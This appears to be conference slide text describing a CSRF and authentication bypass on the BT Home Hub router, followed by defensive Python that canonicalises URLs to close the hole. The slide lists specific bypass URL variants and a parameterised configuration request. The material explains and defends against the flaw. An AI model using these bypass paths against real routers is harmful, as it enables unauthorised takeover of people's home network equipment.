Personal Fav. #1:
CSRF + auth bypass (pt 2)
- Real example: BT Home Hub (tested on firmware 6.2.2.6)
  - possibly the most popular DSL router in the UK
- Auth bypass found via URL fuzzing [link]
- The web server accepts multiple representations of a URL, some of which are not checked for a password
- We append special symbols after the directory name, e.g.:
  - /cgi/b/secpol/cfg/%5C
  - /cgi/b/secpol/cfg//
  - /cgi/b/secpol/cfg/%
  - /cgi/b/secpol/cfg/~
- If we need to submit parameters, we append them after the double special symbols: /cgi/b/_wli_/cfg//?ce=1&be=1&l0=4&l1=0
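The slide's bug class is an auth check keyed on the raw request string, so any alternate spelling of a protected path is treated as public. The added example below (not the router's code; the `/cgi/b/` protected prefix, the page table and the variant list are assumptions built from the slide) contrasts that naive lookup with a canonicalize-then-deny-by-default check that catches every variant listed above.

```python
from urllib.parse import unquote
import posixpath

PROTECTED_PREFIX = "/cgi/b/"   # assumption: every page under here needs a login

# Constructed from the slide: the representations the server accepted unchecked.
SLIDE_VARIANTS = [
    "/cgi/b/secpol/cfg/%5C",
    "/cgi/b/secpol/cfg//",
    "/cgi/b/secpol/cfg/%",
    "/cgi/b/secpol/cfg/~",
    "/cgi/b/_wli_/cfg//?ce=1&be=1&l0=4&l1=0",
]


def naive_requires_auth(raw_path: str) -> bool:
    """Flawed pattern: look the *raw* request string up in a table of
    protected pages; any spelling not in the table is treated as public."""
    protected_pages = {"/cgi/b/secpol/cfg/", "/cgi/b/_wli_/cfg/"}
    return raw_path in protected_pages


def canonicalize(raw_path: str) -> str:
    """Reduce every representation of a URL to one form before any
    security decision is made."""
    path = raw_path.split("?", 1)[0]      # query string never affects the resource
    prev = None
    while prev != path:                   # decode until stable (defeats double encoding)
        prev, path = path, unquote(path)
    path = path.replace("\\", "/")        # treat backslash (%5C) as a separator
    path = posixpath.normpath(path)       # collapse '//' and resolve '.' / '..'
    if not path.startswith("/"):
        path = "/" + path
    return path


def hardened_requires_auth(raw_path: str) -> bool:
    """Deny by default: decide on the canonical path and on the protected
    prefix, not on an exact match of an attacker-controlled string."""
    return canonicalize(raw_path).startswith(PROTECTED_PREFIX)


def audit(paths=SLIDE_VARIANTS):
    """Return the variants that slip past the naive check but not the hardened one."""
    return [p for p in paths if not naive_requires_auth(p) and hardened_requires_auth(p)]
```

Running `audit()` returns all five slide variants: each one bypasses the raw-string lookup and is caught once the path is canonicalized.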